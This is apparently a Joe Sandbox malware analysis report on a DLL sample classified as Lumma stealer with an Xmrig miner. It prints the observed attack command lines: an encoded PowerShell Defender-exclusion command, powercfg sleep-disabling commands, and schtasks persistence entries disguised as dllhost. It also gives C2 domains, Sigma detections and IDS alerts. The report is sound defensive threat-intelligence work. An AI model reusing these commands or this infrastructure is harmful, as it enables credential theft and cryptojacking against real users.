Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n7ZKbApaa3.dll

Overview

General Information

Sample name:n7ZKbApaa3.dll
renamed because original name is a hash value
Original sample name:0633330e8156219a811ac8e36dffb340c8843df3cc74036f746779f833327cd2.dll
Analysis ID:1555757
MD5:26c9a2ed08569a57d6b33a1f884f6aa7
SHA1:02f05f0d48ddb7cfe071ddfd0740ed4c5c6e3cb7
SHA256:0633330e8156219a811ac8e36dffb340c8843df3cc74036f746779f833327cd2
Tags:dllrepostebhu-sbsuser-JAMESWT_MHT
Infos:

Detection

LummaC, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops password protected ZIP file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 8036 cmdline: loaddll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8136 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 8160 cmdline: rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • aspnet_regiis.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
          • MPDIZKEMMIDUY52JFU3.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe" MD5: CE901A874C9D157E48F83B1BE3D32AA6)
    • rundll32.exe (PID: 8144 cmdline: rundll32.exe C:\Users\user\Desktop\n7ZKbApaa3.dll,WindowsHandle MD5: 889B99C52A60DD49227C5E485A016679)
      • aspnet_regiis.exe (PID: 7188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
        • OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe (PID: 1204 cmdline: "C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe" MD5: CE901A874C9D157E48F83B1BE3D32AA6)
          • cmd.exe (PID: 2068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mode.com (PID: 2732 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
            • 7z.exe (PID: 3136 cmdline: 7z.exe e file.zip -p29586644319935208542739921766 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 2972 cmdline: 7z.exe e extracted/file_11.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 2924 cmdline: 7z.exe e extracted/file_10.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 2356 cmdline: 7z.exe e extracted/file_9.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4240 cmdline: 7z.exe e extracted/file_8.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 3844 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 5292 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4056 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4332 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4460 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 3916 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 5076 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • attrib.exe (PID: 4772 cmdline: attrib +H "Installer.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • Installer.exe (PID: 4952 cmdline: "Installer.exe" MD5: 89A069871324D35E25922F6FB881D514)
              • RegSvcs.exe (PID: 6704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • cmd.exe (PID: 1988 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 4556 cmdline: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                    • WmiPrvSE.exe (PID: 4100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                  • powercfg.exe (PID: 5288 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
                  • powercfg.exe (PID: 3936 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
                  • powercfg.exe (PID: 4272 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
                  • powercfg.exe (PID: 2836 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
                  • powercfg.exe (PID: 8172 cmdline: powercfg /hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
                • cmd.exe (PID: 8156 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 8116 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
                • cmd.exe (PID: 8028 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 8068 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • rundll32.exe (PID: 6472 cmdline: rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",WindowsHandle MD5: 889B99C52A60DD49227C5E485A016679)
      • aspnet_regiis.exe (PID: 6080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["thinkyyokej.sbs", "explainvees.sbs", "tamedgeesy.sbs", "rottieud.sbs", "ducksringjk.sbs", "brownieyuz.sbs", "repostebhu.sbs", "relalingj.sbs", "pragapin.sbs"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000003.1652122961.0000000002936000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000003.1648946137.0000000002936000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000003.1646851786.0000000002936000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000003.1647706451.0000000002936000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000008.00000003.1649257545.0000000002936000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 67 entries
              SourceRuleDescriptionAuthorStrings
              33.2.RegSvcs.exe.243329d.2.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                System Summary

                barindex
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6704, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6704, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 1988, ProcessName: cmd.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1988, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , ProcessId: 4556, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1988, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" , ProcessId: 4556, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 6704, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 8156, ProcessName: cmd.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:29.461435+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1049789TCP
                2024-11-14T12:20:09.185130+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1049992TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:28.099910+010020283713Unknown Traffic192.168.2.1049794104.102.49.254443TCP
                2024-11-14T12:19:28.101526+010020283713Unknown Traffic192.168.2.1049793104.102.49.254443TCP
                2024-11-14T12:19:29.656887+010020283713Unknown Traffic192.168.2.1049802188.114.97.3443TCP
                2024-11-14T12:19:29.659001+010020283713Unknown Traffic192.168.2.1049803188.114.97.3443TCP
                2024-11-14T12:19:30.960384+010020283713Unknown Traffic192.168.2.1049814104.102.49.254443TCP
                2024-11-14T12:19:31.478233+010020283713Unknown Traffic192.168.2.1049816188.114.97.3443TCP
                2024-11-14T12:19:31.496127+010020283713Unknown Traffic192.168.2.1049818188.114.97.3443TCP
                2024-11-14T12:19:34.410278+010020283713Unknown Traffic192.168.2.1049835188.114.97.3443TCP
                2024-11-14T12:19:34.941754+010020283713Unknown Traffic192.168.2.1049839188.114.97.3443TCP
                2024-11-14T12:19:40.521903+010020283713Unknown Traffic192.168.2.1049867188.114.97.3443TCP
                2024-11-14T12:19:43.416747+010020283713Unknown Traffic192.168.2.1049883188.114.97.3443TCP
                2024-11-14T12:19:43.482312+010020283713Unknown Traffic192.168.2.1049887188.114.97.3443TCP
                2024-11-14T12:19:46.363351+010020283713Unknown Traffic192.168.2.1049903188.114.97.3443TCP
                2024-11-14T12:19:46.838915+010020283713Unknown Traffic192.168.2.1049904188.114.97.3443TCP
                2024-11-14T12:19:48.321902+010020283713Unknown Traffic192.168.2.1049914188.114.97.3443TCP
                2024-11-14T12:19:48.386896+010020283713Unknown Traffic192.168.2.1049915188.114.97.3443TCP
                2024-11-14T12:19:50.115623+010020283713Unknown Traffic192.168.2.1049926188.114.97.3443TCP
                2024-11-14T12:19:51.951371+010020283713Unknown Traffic192.168.2.1049934188.114.97.3443TCP
                2024-11-14T12:19:53.708804+010020283713Unknown Traffic192.168.2.1049945188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:30.762640+010020546531A Network Trojan was detected192.168.2.1049803188.114.97.3443TCP
                2024-11-14T12:19:30.795891+010020546531A Network Trojan was detected192.168.2.1049802188.114.97.3443TCP
                2024-11-14T12:19:33.432190+010020546531A Network Trojan was detected192.168.2.1049818188.114.97.3443TCP
                2024-11-14T12:19:33.436165+010020546531A Network Trojan was detected192.168.2.1049816188.114.97.3443TCP
                2024-11-14T12:19:56.158833+010020546531A Network Trojan was detected192.168.2.1049934188.114.97.3443TCP
                2024-11-14T12:19:56.158971+010020546531A Network Trojan was detected192.168.2.1049945188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:30.762640+010020498361A Network Trojan was detected192.168.2.1049803188.114.97.3443TCP
                2024-11-14T12:19:30.795891+010020498361A Network Trojan was detected192.168.2.1049802188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:33.432190+010020498121A Network Trojan was detected192.168.2.1049818188.114.97.3443TCP
                2024-11-14T12:19:33.436165+010020498121A Network Trojan was detected192.168.2.1049816188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:29.656887+010020574161Domain Observed Used for C2 Detected192.168.2.1049802188.114.97.3443TCP
                2024-11-14T12:19:29.659001+010020574161Domain Observed Used for C2 Detected192.168.2.1049803188.114.97.3443TCP
                2024-11-14T12:19:31.478233+010020574161Domain Observed Used for C2 Detected192.168.2.1049816188.114.97.3443TCP
                2024-11-14T12:19:31.496127+010020574161Domain Observed Used for C2 Detected192.168.2.1049818188.114.97.3443TCP
